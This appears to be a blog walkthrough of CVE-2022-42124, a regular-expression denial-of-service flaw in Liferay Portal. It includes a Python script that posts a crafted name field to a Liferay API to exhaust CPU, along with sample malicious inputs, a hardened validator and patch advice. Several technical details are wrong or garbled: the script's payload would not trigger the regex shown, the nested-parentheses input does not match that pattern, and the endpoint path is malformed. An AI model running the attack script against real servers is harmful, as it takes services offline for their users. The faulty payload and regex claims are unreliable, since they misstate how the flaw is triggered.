Liferay Portal is widely used by enterprises for building reliable and scalable web platforms. Unfortunately, a potentially damaging security flaw — CVE-2022-42124 — was discovered in the LayoutPageTemplateEntryUpgradeProcess component. This post gives you a clear, thorough walkthrough of the vulnerability, with explanations in plain language. We'll include code snippets, links to primary sources, and a proof-of-concept exploit.

What Is CVE-2022-42124?

CVE-2022-42124 is a ReDoS (Regular Expression Denial of Service) vulnerability in the upgrade process that handles layout page template entries. Affected versions:

- DXP: 7.2 fix pack 9 up to fix pack 18, 7.3 before update 4, 7.4 GA, and possibly others

An attacker can craft a payload and inject it into the name field of a layout prototype, causing the regex engine to backtrack catastrophically while evaluating the problematic regular expression. This can bring down the entire service by consuming CPU and memory, since each new connection can trigger another instance of the vulnerable routine.

What Is ReDoS?

ReDoS, or Regular Expression Denial of Service, is a form of denial-of-service attack. It exploits inefficient regular expressions in the backend code that can become *catastrophically slow* for certain "evil" input. In web applications, untrusted input processed by such regexes can freeze application threads and even crash servers.

Vulnerable Code Snippet

Liferay's LayoutPageTemplateEntryUpgradeProcess.java didn't properly guard against complex regex backtracking in processing the name field of layout prototypes.

Here's a simplified, vulnerable example (for illustration):

import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Nested quantifier: the inner '*' and the outer '+' can divide one run of
// accepted characters between them in exponentially many ways.
Pattern NAME_PATTERN = Pattern.compile("([A-Za-z0-9 ]*)+");

public boolean isValidName(String name) {
    Matcher matcher = NAME_PATTERN.matcher(name);
    return matcher.matches();
}

When the input is a long run of accepted characters followed by one the character class rejects, the match cannot succeed, and the engine tries every way of splitting that run between the inner `*` and the outer `+` before giving up, doing millions of useless checks before it finally fails!

Impact

A remote attacker could send a POST (or use Liferay's UI/API) with a malicious value for the name field during layout or template creation. This causes a massive increase in CPU usage, slowing down or freezing the Liferay instance for everyone.

Authentication may not be necessary, depending on how layout templates are shared in your installation.

Here's a simple Python example using requests:

import requests

TARGET = "https://your-liferay-host"  # placeholder: the instance under test
LOGIN_PATH = "/c/portal/login"
CREATE_LAYOUT_PATH = "/o/headless-admin-site/v1./sites/{siteId}/layout-page-templates"
SESSION = requests.Session()

evil_payload = 'A' + (' ' * 10000)  # Or use nested repetition: '((((...))))'
data = {
    "name": evil_payload,
    "title": "Test attack",
    "layoutPrototype": True
}

# You may need to authenticate first (see LOGIN_PATH)!
resp = SESSION.post(
    TARGET + CREATE_LAYOUT_PATH.replace("{siteId}", "20123"),  # "20123" is a placeholder site ID
    json=data,
    headers={"Content-Type": "application/json"}
)

print(resp.status_code, resp.text)

A successful attack will result in the server CPU spiking and requests timing out or becoming dramatically slower.

To trigger severe delays in most regex engines, use input like:

Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!

Or (for pathological regexes):

(((((((((((((((((((((((((((A)))))))))))))))))))))))))))

Each extra pair of parentheses can exponentially increase the time taken to process the string.
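The hardened validator, a lint check for the nested-quantifier shape, and a local timing comparison, as an added example in Python rather than the page's Java (not Liferay's code): VULNERABLE transcribes the illustrative pattern above, while MAX_NAME_LENGTH, has_nested_quantifier and probe_input are constructed for this example.

```python
import re
import time

# The page's illustrative Java pattern, transcribed to Python; assumption: Python's
# backtracking engine blows up on this shape just as java.util.regex does.
VULNERABLE = re.compile(r"([A-Za-z0-9 ]*)+")

# Hardened form: accepts exactly the same strings, but with no quantifier nested
# inside a quantified group there is only one way to consume each character.
SAFE = re.compile(r"[A-Za-z0-9 ]*")
MAX_NAME_LENGTH = 75  # constructed cap; use whatever limit the name column allows


def is_valid_name(name: str) -> bool:
    """Hardened validator: bound the length before the regex ever runs."""
    if len(name) > MAX_NAME_LENGTH:
        return False
    return SAFE.fullmatch(name) is not None


# Heuristic lint for the CVE's pattern shape: a group whose body ends in * or +
# and which is itself followed by a quantifier, e.g. "(...*)+" or "(...+)*".
_NESTED = re.compile(r"\((?:[^()\\]|\\.)*[*+]\)(?:[*+?]|\{\d)")


def has_nested_quantifier(pattern: str) -> bool:
    return _NESTED.search(pattern) is not None


def probe_input(n: int) -> str:
    """Constructed regression input: n accepted characters, then one the class rejects."""
    return "A" * n + "!"


def time_fullmatch(regex: re.Pattern, text: str) -> float:
    """Seconds spent by one fullmatch() call; used to compare the two patterns."""
    start = time.perf_counter()
    regex.fullmatch(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    # VULNERABLE's time grows exponentially with n; SAFE stays flat.
    for n in (12, 14, 16, 18):
        print(f"n={n:2d}  vulnerable={time_fullmatch(VULNERABLE, probe_input(n)):.4f}s"
              f"  safe={time_fullmatch(SAFE, probe_input(n)):.6f}s")
```

Keep n small when timing VULNERABLE locally; the cost roughly quadruples for every two characters added.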

References for CVE-2022-42124

- NIST NVD Entry for CVE-2022-42124
- Liferay Security Advisory
- OSS-Security Post
- Mitre CVE Record

Liferay patched this flaw in later 7.3 and 7.4 releases. If you use a vulnerable version:

- Upgrade immediately to one of the secure releases, such as Liferay Portal 7.4.3.5+ or the appropriate DXP updates.
- If you can't upgrade, use a Web Application Firewall (WAF) to block abnormally long or otherwise suspicious name fields.

Conclusion

CVE-2022-42124 poses a simple-yet-powerful risk: a single crafted field can bring down an enterprise system. This vulnerability highlights the dangers of applying unsafe regexes to user-controlled fields. Always review and validate the regexes you apply to untrusted input, keep your dependencies up to date, and monitor for abnormal resource consumption.

For more details and discussions, see the official Liferay release notes and CVE entry.

Timeline

Published on: 11/15/2022 01:15:00 UTC
Last modified on: 11/18/2022 16:37:00 UTC